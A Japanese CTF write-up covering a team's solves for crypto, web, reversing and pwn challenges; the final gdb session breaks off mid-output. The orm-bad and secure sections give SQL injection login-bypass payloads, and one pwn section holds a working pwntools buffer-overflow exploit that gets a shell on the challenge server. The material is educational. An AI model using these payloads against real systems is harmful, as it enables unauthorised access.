この大会は2021/7/10 4:00(JST)~2021/7/13 4:00(JST)に開催されました。
今回もチームで参戦。結果は 2341点で1418チーム中52位でした。
自分で解けた問題をWriteupとして書いておきます。
sanity-check (misc)
問題にフラグが書いてあった。
flag{1_l0v3_54n17y_ch3ck_ch4ll5}
discord (misc)
Discordに入り、#rulesチャネルのトピックを見ると、フラグが書いてあった。
flag{chall3n63_au7h0r5h1p_1nfl4710n}
inspect-me (web)
HTMLソースを見ると、コメントにフラグが書いてあった。
<!-- flag{inspect_me_like_123} -->
flag{inspect_me_like_123}
compliant-lattice-feline (misc)
ncで接続するだけ。
$ nc mc.ax 31443 flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
scissor (crypto)
暗号を見るだけでも推測できるが、添付のスクリプトからシーザー暗号になっていることがわかる。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。
Rotation 12: surround_this_flag_with_flag_format
flag{surround_this_flag_with_flag_format}
orm-bad (web)
Usernameが"admin"でログインできれば、フラグが表示される。SQLインジェクション。以下のように入力して、ログインすると、フラグが表示された。
Username: admin' -- Password: (空)
flag{sqli_overused_again_0b4f6}
wstrings (rev)
$ gdb -q ./wstrings Reading symbols from ./wstrings...(no debugging symbols found)...done. gdb-peda$ start [----------------------------------registers-----------------------------------] RAX: 0x55555555481a (<main>: push rbp) RBX: 0x0 RCX: 0x5555555548b0 (<__libc_csu_init>: push r15) RDX: 0x7fffffffdf38 --> 0x7fffffffe27a ("CLUTTER_IM_MODULE=xim") RSI: 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings") RDI: 0x1 RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15) RSP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15) RIP: 0x55555555481e (<main+4>: sub rsp,0x150) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x555555554710 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf20 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x555555554815 <frame_dummy+5>: jmp 0x555555554780 <register_tm_clones> 0x55555555481a <main>: push rbp 0x55555555481b <main+1>: mov rbp,rsp => 0x55555555481e <main+4>: sub rsp,0x150 0x555555554825 <main+11>: mov rax,QWORD PTR fs:0x28 0x55555555482e <main+20>: mov QWORD PTR [rbp-0x8],rax 0x555555554832 <main+24>: xor eax,eax 0x555555554834 <main+26>: lea rdi,[rip+0x185] # 0x5555555549c0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15) 0008| 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) 0016| 0x7fffffffde50 --> 0x1 0024| 0x7fffffffde58 --> 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings") 0032| 0x7fffffffde60 --> 0x100008000 0040| 0x7fffffffde68 --> 0x55555555481a (<main>: push rbp) 0048| 0x7fffffffde70 --> 0x0 0056| 0x7fffffffde78 --> 0xdec3a62e07b837fc [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, 0x000055555555481e in main () gdb-peda$ disas main Dump of assembler code for function main: 0x000055555555481a <+0>: push rbp 0x000055555555481b <+1>: mov rbp,rsp => 0x000055555555481e <+4>: sub rsp,0x150 0x0000555555554825 <+11>: mov rax,QWORD PTR fs:0x28 0x000055555555482e <+20>: mov QWORD PTR [rbp-0x8],rax 0x0000555555554832 <+24>: xor eax,eax 0x0000555555554834 <+26>: lea rdi,[rip+0x185] # 0x5555555549c0 0x000055555555483b <+33>: mov eax,0x0 0x0000555555554840 <+38>: call 0x5555555546f0 <wprintf@plt> 0x0000555555554845 <+43>: mov rdx,QWORD PTR [rip+0x2007e4] # 0x555555755030 <stdin@@GLIBC_2.2.5> 0x000055555555484c <+50>: lea rax,[rbp-0x150] 0x0000555555554853 <+57>: mov esi,0x50 0x0000555555554858 <+62>: mov rdi,rax 0x000055555555485b <+65>: call 0x5555555546c0 <fgetws@plt> 0x0000555555554860 <+70>: mov rax,QWORD PTR [rip+0x2007a9] # 0x555555755010 <flag> 0x0000555555554867 <+77>: lea rdx,[rbp-0x150] 0x000055555555486e <+84>: mov rsi,rdx 0x0000555555554871 <+87>: mov rdi,rax 0x0000555555554874 <+90>: call 0x5555555546b0 <wcscmp@plt> 0x0000555555554879 <+95>: test eax,eax 0x000055555555487b <+97>: jne 0x555555554893 <main+121> 0x000055555555487d <+99>: mov rax,QWORD PTR [rip+0x20079c] # 0x555555755020 <stdout@@GLIBC_2.2.5> 0x0000555555554884 <+106>: mov rsi,rax 0x0000555555554887 <+109>: lea rdi,[rip+0x1ea] # 0x555555554a78 0x000055555555488e <+116>: call 0x5555555546e0 <fputws@plt> 0x0000555555554893 <+121>: mov eax,0x0 0x0000555555554898 <+126>: mov rcx,QWORD PTR [rbp-0x8] 0x000055555555489c <+130>: xor rcx,QWORD PTR fs:0x28 0x00005555555548a5 <+139>: je 0x5555555548ac <main+146> 0x00005555555548a7 <+141>: call 0x5555555546d0 <__stack_chk_fail@plt> 0x00005555555548ac <+146>: leave 0x00005555555548ad <+147>: ret End of assembler dump. gdb-peda$ b *0x0000555555554874★比較部分にブレークポイント Breakpoint 2 at 0x555555554874 gdb-peda$ c Continuing. Welcome to flag checker 1.0. Give me a flag> hoge [----------------------------------registers-----------------------------------] RAX: 0x555555554938 --> 0x6c00000066 ('f') RBX: 0x0 RCX: 0x1 RDX: 0x7fffffffdcf0 --> 0x6f00000068 ('h') RSI: 0x7fffffffdcf0 --> 0x6f00000068 ('h') RDI: 0x555555554938 --> 0x6c00000066 ('f') RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15) RSP: 0x7fffffffdcf0 --> 0x6f00000068 ('h') RIP: 0x555555554874 (<main+90>: call 0x5555555546b0 <wcscmp@plt>) R8 : 0x555555757aa4 --> 0x0 R9 : 0x7fffffffdb48 --> 0x7fffffffdb60 --> 0x1000 R10: 0x4 R11: 0x4 R12: 0x555555554710 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf20 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x555555554867 <main+77>: lea rdx,[rbp-0x150] 0x55555555486e <main+84>: mov rsi,rdx 0x555555554871 <main+87>: mov rdi,rax => 0x555555554874 <main+90>: call 0x5555555546b0 <wcscmp@plt> 0x555555554879 <main+95>: test eax,eax 0x55555555487b <main+97>: jne 0x555555554893 <main+121> 0x55555555487d <main+99>: mov rax,QWORD PTR [rip+0x20079c] # 0x555555755020 <stdout@@GLIBC_2.2.5> 0x555555554884 <main+106>: mov rsi,rax Guessed arguments: arg[0]: 0x555555554938 --> 0x6c00000066 ('f') arg[1]: 0x7fffffffdcf0 --> 0x6f00000068 ('h') arg[2]: 0x7fffffffdcf0 --> 0x6f00000068 ('h') [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdcf0 --> 0x6f00000068 ('h') 0008| 0x7fffffffdcf8 --> 0x6500000067 ('g') 0016| 0x7fffffffdd00 --> 0xa ('\n') 0024| 0x7fffffffdd08 --> 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) 0032| 0x7fffffffdd10 --> 0x7fffffffde80 --> 0x555555554710 (<_start>: xor ebp,ebp) 0040| 0x7fffffffdd18 --> 0x7ffff7ffe710 --> 0x7ffff7ffb000 (jg 0x7ffff7ffb047) 0048| 0x7fffffffdd20 --> 0x0 0056| 0x7fffffffdd28 --> 0x7ffff7dde39f (<_dl_lookup_symbol_x+319>: add rsp,0x30) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x0000555555554874 in main () gdb-peda$ x/s $rax 0x555555554938: "f" gdb-peda$ x/100s $rax 0x555555554938: "f" 0x55555555493a: "" 0x55555555493b: "" 0x55555555493c: "l" 0x55555555493e: "" 0x55555555493f: "" 0x555555554940: "a" 0x555555554942: "" 0x555555554943: "" 0x555555554944: "g" 0x555555554946: "" 0x555555554947: "" 0x555555554948: "{" 0x55555555494a: "" 0x55555555494b: "" 0x55555555494c: "n" 0x55555555494e: "" 0x55555555494f: "" 0x555555554950: "0" 0x555555554952: "" 0x555555554953: "" 0x555555554954: "t" 0x555555554956: "" 0x555555554957: "" 0x555555554958: "_" 0x55555555495a: "" 0x55555555495b: "" 0x55555555495c: "a" 0x55555555495e: "" 0x55555555495f: "" 0x555555554960: "l" 0x555555554962: "" 0x555555554963: "" 0x555555554964: "1" 0x555555554966: "" 0x555555554967: "" 0x555555554968: "_" 0x55555555496a: "" 0x55555555496b: "" 0x55555555496c: "s" 0x55555555496e: "" 0x55555555496f: "" 0x555555554970: "t" 0x555555554972: "" 0x555555554973: "" 0x555555554974: "r" 0x555555554976: "" 0x555555554977: "" 0x555555554978: "1" 0x55555555497a: "" 0x55555555497b: "" 0x55555555497c: "n" 0x55555555497e: "" 0x55555555497f: "" 0x555555554980: "g" 0x555555554982: "" 0x555555554983: "" 0x555555554984: "s" 0x555555554986: "" 0x555555554987: "" 0x555555554988: "_" 0x55555555498a: "" 0x55555555498b: "" 0x55555555498c: "a" 0x55555555498e: "" 0x55555555498f: "" 0x555555554990: "r" 0x555555554992: "" 0x555555554993: "" 0x555555554994: "3" 0x555555554996: "" 0x555555554997: "" 0x555555554998: "_" 0x55555555499a: "" 0x55555555499b: "" 0x55555555499c: "s" 0x55555555499e: "" 0x55555555499f: "" 0x5555555549a0: "k" 0x5555555549a2: "" 0x5555555549a3: "" 0x5555555549a4: "1" 0x5555555549a6: "" 0x5555555549a7: "" 0x5555555549a8: "n" 0x5555555549aa: "" 0x5555555549ab: "" 0x5555555549ac: "n" 0x5555555549ae: "" 0x5555555549af: "" 0x5555555549b0: "y" 0x5555555549b2: "" 0x5555555549b3: "" 0x5555555549b4: "}" 0x5555555549b6: "" 0x5555555549b7: "" 0x5555555549b8: "" 0x5555555549b9: "" 0x5555555549ba: "" 0x5555555549bb: ""
レジスタRAXのアドレス以降に入っている文字を連結する。
flag{n0t_al1_str1ngs_ar3_sk1nny}
baby (crypto)
n = 228430203128652625114739053365339856393 = 12546190522253739887 * 18207136478875858439
あとはそのまま復号する。
from Crypto.Util.number import * n = 228430203128652625114739053365339856393 e = 65537 c = 126721104148692049427127809839057445790 p = 12546190522253739887 q = 18207136478875858439 phi = (p - 1) * (q - 1) d = inverse(e, phi) m = pow(c, d, n) flag = long_to_bytes(m) print flag
flag{68ab82df34}
secure (web)
スクリプトからログインできたらフラグが表示されることがわかる。
$ curl -X POST -d 'username=admin&password=a' https://secure.mc.ax/login Found. Redirecting to /?message=Incorrect%20username%20or%20password.%20Query:%20SELECT%20id%20FROM%20users%20WHERE%0A%20%20%20%20%20%20%20%20%20%20username%20=%20'admin'%20AND%0A%20%20%20%20%20%20%20%20%20%20password%20=%20'a';
URLデコードする。
/?message=Incorrect username or password. Query: SELECT id FROM users WHERE username = 'admin' AND password = 'a';
クエリがわかる。SQL文の途中に改行があるため、passwordの行でコメントを使って、SQLインジェクションを行う。
$ curl -X POST -d "username=admin&password=' UNION SELECT 1 --" https://secure.mc.ax/login Found. Redirecting to /?message=flag%7B50m37h1n6_50m37h1n6_cl13n7_n07_600d%7D
flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d}
beginner-generic-pwn-number-0 (pwn)
BOFでinspirational_message_indexを上書き、-1になるようにする。
$ file beginner-generic-pwn-number-0 beginner-generic-pwn-number-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=954a4064a32902a83a98f211211c5eafdef2b3c0, for GNU/Linux 3.2.0, not stripped $ gdb -q ./beginner-generic-pwn-number-0 Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done. gdb-peda$ start [----------------------------------registers-----------------------------------] RAX: 0x4011f6 (<main>: endbr64) RBX: 0x0 RCX: 0x4012c0 (<__libc_csu_init>: endbr64) RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim") RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0") RDI: 0x1 RBP: 0x4012c0 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) RIP: 0x4011f6 (<main>: endbr64) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x401110 (<_start>: endbr64) R13: 0x7fffffffdef0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4011ec <__do_global_dtors_aux+44>: nop DWORD PTR [rax+0x0] 0x4011f0 <frame_dummy>: endbr64 0x4011f4 <frame_dummy+4>: jmp 0x401180 <register_tm_clones> => 0x4011f6 <main>: endbr64 0x4011fa <main+4>: push rbp 0x4011fb <main+5>: mov rbp,rsp 0x4011fe <main+8>: sub rsp,0x30 0x401202 <main+12>: mov edi,0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) 0008| 0x7fffffffde20 --> 0x1 0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0") 0024| 0x7fffffffde30 --> 0x100008000 0032| 0x7fffffffde38 --> 0x4011f6 (<main>: endbr64) 0040| 0x7fffffffde40 --> 0x0 0048| 0x7fffffffde48 --> 0xdf4a7506815ae20d 0056| 0x7fffffffde50 --> 0x401110 (<_start>: endbr64) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, 0x00000000004011f6 in main () gdb-peda$ b main Breakpoint 2 at 0x4011f6 gdb-peda$ q ctf@ctf-virtual-machine:/mnt/hgfs/Shared$ gdb -q ./beginner-generic-pwn-number-0 Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done. gdb-peda$ start [----------------------------------registers-----------------------------------] RAX: 0x4011f6 (<main>: endbr64) RBX: 0x0 RCX: 0x4012c0 (<__libc_csu_init>: endbr64) RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim") RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0") RDI: 0x1 RBP: 0x4012c0 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) RIP: 0x4011f6 (<main>: endbr64) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x401110 (<_start>: endbr64) R13: 0x7fffffffdef0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4011ec <__do_global_dtors_aux+44>: nop DWORD PTR [rax+0x0] 0x4011f0 <frame_dummy>: endbr64 0x4011f4 <frame_dummy+4>: jmp 0x401180 <register_tm_clones> => 0x4011f6 <main>: endbr64 0x4011fa <main+4>: push rbp 0x4011fb <main+5>: mov rbp,rsp 0x4011fe <main+8>: sub rsp,0x30 0x401202 <main+12>: mov edi,0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) 0008| 0x7fffffffde20 --> 0x1 0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0") 0024| 0x7fffffffde30 --> 0x100008000 0032| 0x7fffffffde38 --> 0x4011f6 (<main>: endbr64) 0040| 0x7fffffffde40 --> 0x0 0048| 0x7fffffffde48 --> 0x2c813c5a2d2779ff 0056| 0x7fffffffde50 --> 0x401110 (<_start>: endbr64) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, 0x00000000004011f6 in main () gdb-peda$ disas main Dump of assembler code for function main: => 0x00000000004011f6 <+0>: endbr64 0x00000000004011fa <+4>: push rbp 0x00000000004011fb <+5>: mov rbp,rsp 0x00000000004011fe <+8>: sub rsp,0x30 0x0000000000401202 <+12>: mov edi,0x0 0x0000000000401207 <+17>: mov eax,0x0 0x000000000040120c <+22>: call 0x4010e0 <time@plt> 0x0000000000401211 <+27>: mov edi,eax 0x0000000000401213 <+29>: call 0x4010d0 <srand@plt> 0x0000000000401218 <+34>: call 0x401100 <rand@plt> 0x000000000040121d <+39>: cdqe 0x000000000040121f <+41>: and eax,0x1 0x0000000000401222 <+44>: mov QWORD PTR [rbp-0x8],rax 0x0000000000401226 <+48>: mov rax,QWORD PTR [rip+0x2e53] # 0x404080 <stdout@@GLIBC_2.2.5> 0x000000000040122d <+55>: mov esi,0x0 0x0000000000401232 <+60>: mov rdi,rax 0x0000000000401235 <+63>: call 0x4010b0 <setbuf@plt> 0x000000000040123a <+68>: mov rax,QWORD PTR [rip+0x2e4f] # 0x404090 <stdin@@GLIBC_2.2.5> 0x0000000000401241 <+75>: mov esi,0x0 0x0000000000401246 <+80>: mov rdi,rax 0x0000000000401249 <+83>: call 0x4010b0 <setbuf@plt> 0x000000000040124e <+88>: mov rax,QWORD PTR [rip+0x2e4b] # 0x4040a0 <stderr@@GLIBC_2.2.5> 0x0000000000401255 <+95>: mov esi,0x0 0x000000000040125a <+100>: mov rdi,rax 0x000000000040125d <+103>: call 0x4010b0 <setbuf@plt> 0x0000000000401262 <+108>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000401266 <+112>: lea rdx,[rax*8+0x0] 0x000000000040126e <+120>: lea rax,[rip+0x2deb] # 0x404060 <inspirational_messages> 0x0000000000401275 <+127>: mov rax,QWORD PTR [rdx+rax*1] 0x0000000000401279 <+131>: mov rdi,rax 0x000000000040127c <+134>: call 0x4010a0 <puts@plt> 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150 0x0000000000401288 <+146>: call 0x4010a0 <puts@plt> 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0 0x0000000000401294 <+158>: call 0x4010a0 <puts@plt> 0x0000000000401299 <+163>: lea rax,[rbp-0x30] 0x000000000040129d <+167>: mov rdi,rax 0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt> 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff 0x00000000004012aa <+180>: jne 0x4012b8 <main+194> 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8 0x00000000004012b3 <+189>: call 0x4010c0 <system@plt> 0x00000000004012b8 <+194>: mov eax,0x0 0x00000000004012bd <+199>: leave 0x00000000004012be <+200>: ret End of assembler dump. gdb-peda$ b *0x00000000004012a5 Breakpoint 2 at 0x4012a5 gdb-peda$ pattc 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ c Continuing. "𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! can you write me a heartfelt message to cheer me up? :( AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL [----------------------------------registers-----------------------------------] RAX: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RBX: 0x0 RCX: 0x7ffff7dcda00 --> 0xfbad208b RDX: 0x7ffff7dcf8d0 --> 0x0 RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a RDI: 0x0 RBP: 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RSP: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") RIP: 0x4012a5 (<main+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff) R8 : 0x7ffff7dcf8c0 --> 0x0 R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0) R10: 0x3 R11: 0x246 R12: 0x401110 (<_start>: endbr64) R13: 0x7fffffffdef0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x401299 <main+163>: lea rax,[rbp-0x30] 0x40129d <main+167>: mov rdi,rax 0x4012a0 <main+170>: call 0x4010f0 <gets@plt> => 0x4012a5 <main+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff 0x4012aa <main+180>: jne 0x4012b8 <main+194> 0x4012ac <main+182>: lea rdi,[rip+0xf35] # 0x4021e8 0x4012b3 <main+189>: call 0x4010c0 <system@plt> 0x4012b8 <main+194>: mov eax,0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0x7fffffffdde8 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0016| 0x7fffffffddf0 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0024| 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0032| 0x7fffffffde00 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0040| 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0048| 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0056| 0x7fffffffde18 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x00000000004012a5 in main () gdb-peda$ patto bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL★RBP bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 48
RBP-0x8のアドレスにある値と比較しているので、40バイトの後0xffffffffffffffffをセットすればよい。
from pwn import * if len(sys.argv) == 1: p = remote('mc.ax', 31199) else: p = process('./beginner-generic-pwn-number-0') payload = 'A' * 40 payload += p64(0xffffffffffffffff) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data print payload p.sendline(payload) p.interactive()
実行結果は以下の通り。
[+] Opening connection to mc.ax on port 31199: Done "𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! can you write me a heartfelt message to cheer me up? :( AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff [*] Switching to interactive mode $ ls flag.txt run $ cat flag.txt flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
ret2generic-flag-reader (pwn)
BOFでsuper_generic_flag_reading_function_please_ret_to_me関数に飛ばすようにする。
$ file ret2generic-flag-reader ret2generic-flag-reader: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c749a16c9546cfe2cab694374c7d003c2bbb52f3, for GNU/Linux 3.2.0, not stripped $ gdb -q ./ret2generic-flag-reader Reading symbols from ./ret2generic-flag-reader...(no debugging symbols found)...done. gdb-peda$ i func All defined functions: Non-debugging symbols: 0x0000000000401000 _init 0x00000000004010a0 puts@plt 0x00000000004010b0 fclose@plt 0x00000000004010c0 setbuf@plt 0x00000000004010d0 fgets@plt 0x00000000004010e0 gets@plt 0x00000000004010f0 fopen@plt 0x0000000000401100 exit@plt 0x0000000000401110 _start 0x0000000000401140 _dl_relocate_static_pie 0x0000000000401150 deregister_tm_clones 0x0000000000401180 register_tm_clones 0x00000000004011c0 __do_global_dtors_aux 0x00000000004011f0 frame_dummy 0x00000000004011f6 super_generic_flag_reading_function_please_ret_to_me 0x00000000004013a5 main 0x0000000000401430 __libc_csu_init 0x00000000004014a0 __libc_csu_fini 0x00000000004014a8 _fini gdb-peda$ start [----------------------------------registers-----------------------------------] RAX: 0x4013a5 (<main>: endbr64) RBX: 0x0 RCX: 0x401430 (<__libc_csu_init>: endbr64) RDX: 0x7fffffffdf18 --> 0x7fffffffe26b ("CLUTTER_IM_MODULE=xim") RSI: 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader") RDI: 0x1 RBP: 0x401430 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) RIP: 0x4013a5 (<main>: endbr64) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x401110 (<_start>: endbr64) R13: 0x7fffffffdf00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4013a2 <super_generic_flag_reading_function_please_ret_to_me+428>: nop 0x4013a3 <super_generic_flag_reading_function_please_ret_to_me+429>: leave 0x4013a4 <super_generic_flag_reading_function_please_ret_to_me+430>: ret => 0x4013a5 <main>: endbr64 0x4013a9 <main+4>: push rbp 0x4013aa <main+5>: mov rbp,rsp 0x4013ad <main+8>: sub rsp,0x20 0x4013b1 <main+12>: mov rax,QWORD PTR [rip+0x2ca8] # 0x404060 <stdout@@GLIBC_2.2.5> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) 0008| 0x7fffffffde30 --> 0x1 0016| 0x7fffffffde38 --> 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader") 0024| 0x7fffffffde40 --> 0x100008000 0032| 0x7fffffffde48 --> 0x4013a5 (<main>: endbr64) 0040| 0x7fffffffde50 --> 0x0 0048| 0x7fffffffde58 --> 0x48185c2f2775a721 0056| 0x7fffffffde60 --> 0x401110 (<_start>: endbr64) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, 0x00000000004013a5 in main () gdb-peda$ pattc 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ c Continuing. alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! slap on some flavortext and there's no way rob will fire me now! this is genius!! what do you think? AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7ffff7dcda00 --> 0xfbad208b RDX: 0x7ffff7dcf8d0 --> 0x0 RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a RDI: 0x0 RBP: 0x6141414541412941 ('A)AAEAAa') RSP: 0x7fffffffde28 